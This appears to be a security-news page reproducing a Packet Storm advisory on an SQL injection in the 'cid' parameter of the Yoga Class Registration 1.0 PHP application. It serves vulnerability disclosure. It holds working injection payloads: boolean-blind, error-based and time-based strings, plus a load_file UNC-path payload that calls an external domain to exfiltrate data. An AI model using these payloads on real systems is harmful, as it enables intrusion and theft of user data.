Security
Headlines
HeadlinesLatestCVEs

Headline

Yoga Class Registration 1.0 SQL Injection

Yoga Class Registration version 1.0 suffers from a remote SQL injection vulnerability.

Packet Storm
#sql#vulnerability#web#git#php#auth
## Title: Yoga Class Registration -1.0-2023 - Multiple SQLi## Author: nu11secur1ty## Date: 02.27.2023## Vendor: https://github.com/oretnom23## Software: https://www.sourcecodester.com/php/16097/yoga-class-registration-system-php-and-mysql-free-source-code.html## Reference: https://portswigger.net/web-security/sql-injection## Description:The `cid` parameter appears to be vulnerable to Multiple-SQL injectionattacks. The payload '+(selectload_file('\\\\aaob4nk5vd0lv9e50qp2c5c1dsjl7iv9yxpkg85.stupid.com\\shs'))+'was submitted in the cid parameter. This payload injects a SQLsub-query that calls MySQL's load_file function with a UNC file paththat references a URL on an external domain.The attacker easily can steal all information about this server andthis could be awful for all users of this system.STATUS: HIGH Vulnerability - CRITICAL[+]Payload:```mysql---Parameter: cid (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: p=yclasses/registration&cid=158158925' or '6060'='6060'AND 7469=7469 AND 'IrlM'='IrlM    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: p=yclasses/registration&cid=158158925' or '6060'='6060'AND (SELECT 6894 FROM(SELECT COUNT(*),CONCAT(0x71786b7071,(SELECT(ELT(6894=6894,1))),0x716a6a7871,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'CykB'='CykB    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: p=yclasses/registration&cid=158158925' or '6060'='6060'AND (SELECT 9785 FROM (SELECT(SLEEP(3)))edGv) AND 'KLgd'='KLgd---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/Yoga-Class-Registration%20-1.0-2023%20-%20Multiple-SQLi)## Proof and Exploit:[href](https://streamable.com/hhcgg6)## Time spend:01:00:00

Packet Storm: Latest News

Acronis Cyber Protect/Backup Remote Code Execution